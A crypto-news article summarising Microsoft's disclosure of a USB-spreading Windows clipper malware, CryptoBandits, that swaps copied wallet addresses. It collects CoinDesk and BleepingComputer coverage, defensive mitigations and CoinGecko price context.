Microsoft Flags USB Worm That Quietly Swaps Your Crypto Address

Microsoft Threat Intelligence said on June 17, 2026 that it found a Windows crypto clipper that has been hitting users since February 2026.

Microsoft Defender Antivirus flags it as Trojan:Win32/CryptoBandits.A.

This is more than an exchange breach or a smart-contract exploit. It is old-school removable-media malware aimed straight at how everyday people move coins.

The target list reads like a wallet user’s worst day: BIP39 seed phrases, Bitcoin private keys, and Ethereum private keys, the two assets sitting at the top of the market.

ALERT: @Microsoft identifies USB-spreading malware that hijacks crypto transfers by silently swapping copied wallet addresses with attacker-controlled ones before you paste. Disable AutoRun for USBs, block .lnk file execution, and always verify wallet addresses after pasting.

pic.twitter.com/OQOGH0FKDW

— CoinDesk (@CoinDesk) June 19, 2026

Microsoft documented the CryptoBandits malware chain and the practical defenses Windows crypto users should understand.

Microsoft Threat Intelligence said the Windows-based crypto clipper has affected users since February 2026 and is detected by Defender Antivirus as Trojan:Win32/CryptoBandits.A. The malware spreads through malicious shortcut files on USB drives, then uses Windows built-in automation components and ActiveX behavior to help launch its components.

Once active, it monitors clipboard content roughly every 500 milliseconds, which is exactly the kind of routine crypto users rely on when copying wallet addresses, seed phrases, or private keys. Microsoft said the malware can steal BIP39 seed phrases and Bitcoin or Ethereum private keys, then route the stolen data through Tor-based hidden-service command-and-control infrastructure.

The clipper behavior is especially dangerous because it can replace copied recipient addresses with attacker-controlled addresses before the user pastes them into a wallet or payment flow. Microsoft also described screenshot exfiltration and remote-code execution capability, making the campaign broader than a single clipboard trick.

The recommended mitigations include disabling AutoRun and AutoPlay for removable media, blocking .lnk execution from removable drives, restricting built-in Windows automation tooling, using attack-surface-reduction rules, investigating suspicious curl or PowerShell chains, and hunting local Tor proxy activity on port 9050. The key distinction is that CryptoBandits targets endpoint behavior and wallet habits; it is not a flaw in Bitcoin or Ethereum themselves.

The malware also runs Tor through a local SOCKS5 proxy and polls hidden-service command-and-control. It can grab screenshots and run remote code through a lightweight backdoor.

CoinDesk translated Microsoft’s technical warning into a plain crypto-wallet risk story.

CoinDesk reported that the malware has spread through infected USB drives since February and targets Windows users crypto wallets. The article explained the malicious .lnk file path: a user clicks what appears to be an ordinary shortcut, and the worm installs wallet-stealing code on the machine.

Once installed, it watches the clipboard for seed phrases, private keys, and recipient addresses. If a user copies a crypto address before sending funds, the malware can silently swap in the attacker’s address so the pasted destination is different from the intended one.

CoinDesk also highlighted the propagation cycle that makes the USB angle important. When a clean USB drive is inserted into an infected computer, the worm can replace normal files such as documents, spreadsheets, and PDFs with identically named shortcut files, setting up the next infection.

That makes this a practical hygiene story for anyone moving files by removable media, more than a niche malware note for enterprise security teams. The useful reader takeaway is simple: verify pasted wallet addresses, treat unexpected USB shortcuts as dangerous, and take Microsoft’s endpoint mitigations seriously.

Microsoft Warns of Tor-Based Crypto Clipper Targeting Wallet Data

Microsoft Threat Intelligence and Microsoft Defender Experts said they identified a Windows-based crypto clipper that has affected users since February 2026. The malware spreads via malicious .lnk shortcuts and… pic.twitter.com/tDZ6CNg322

— Wu Blockchain (@WuBlockchain) June 19, 2026

BleepingComputer reinforced the USB worm mechanics from a cybersecurity reporting angle.

BleepingComputer covered the same Microsoft-disclosed campaign and emphasized that the infection chain starts with Windows shortcut files on removable media. Its reporting is useful because it keeps the focus on how the worm spreads from machine to drive and then from drive to another machine.

The crypto payload includes clipper behavior, credential and wallet-data theft, Tor command-and-control, and screenshot exfiltration. That combination makes the campaign more persistent and harder to spot than a one-time fake wallet app.

For crypto users, the most important behavior is address substitution, because a transaction can be sent to the wrong destination even if the wallet software itself is functioning normally. The story also reinforces why endpoint controls matter in crypto security: a hardware wallet or exchange account does not protect every action if the computer used to prepare or verify a transaction is compromised.

BleepingComputer’s angle supports the practical framing without adding unsupported claims about blockchain-level compromise. The malware is attacking Windows systems and user routines, not breaking the cryptographic rules of Bitcoin, Ethereum, or other networks.

The weak point here is the human handoff between copying an address and confirming a transaction. CryptoBandits is built to live in that gap.

The plain takeaway for crypto users on Windows is simple. Treat unknown USB drives as hostile, and check the full receiving address after you paste, more than the first and last characters.

CoinGecko provides the major-asset market context.

CoinGecko current June 19 market data ranked Bitcoin first, Ethereum second, and Solana seventh by market capitalization in its live market-cap table. Bitcoin was near $63,006 in that snapshot, Ethereum was near $1,701, and Solana was near $68.95, giving the coverage a concrete price backdrop.

Those rankings show why ETF filings and wallet-security warnings involving these assets matter beyond narrow product paperwork or specialist trading desks. Bitcoin remains the anchor asset for ETF product design and wallet-security risk, while Ethereum and Solana remain large proof-of-stake networks with staking-specific product implications.

The ranking also separates these stories from lower-liquidity token chatter because the affected assets sit near the center of crypto market attention. Market rank is context only and does not act as a recommendation or a signal that any asset is insulated from volatility.

The ranking simply establishes that the affected assets are liquid, widely followed, and central to investor attention. It also shows that the filing and security angles land during a weak tape, with Bitcoin and Ethereum both trading well below prior-cycle highs.

That context is useful when a filing or malware warning sounds technical at first but has direct implications for the assets most crypto investors recognize.

Join the conversation!

We have no tolerance for comments containing violence, racism, profanity, vulgarity, doxing, or discourteous behavior. If a comment is spam, instead of replying to it please click the icon below and to the right of that comment. Thank you for partnering with us to maintain fruitful conversation.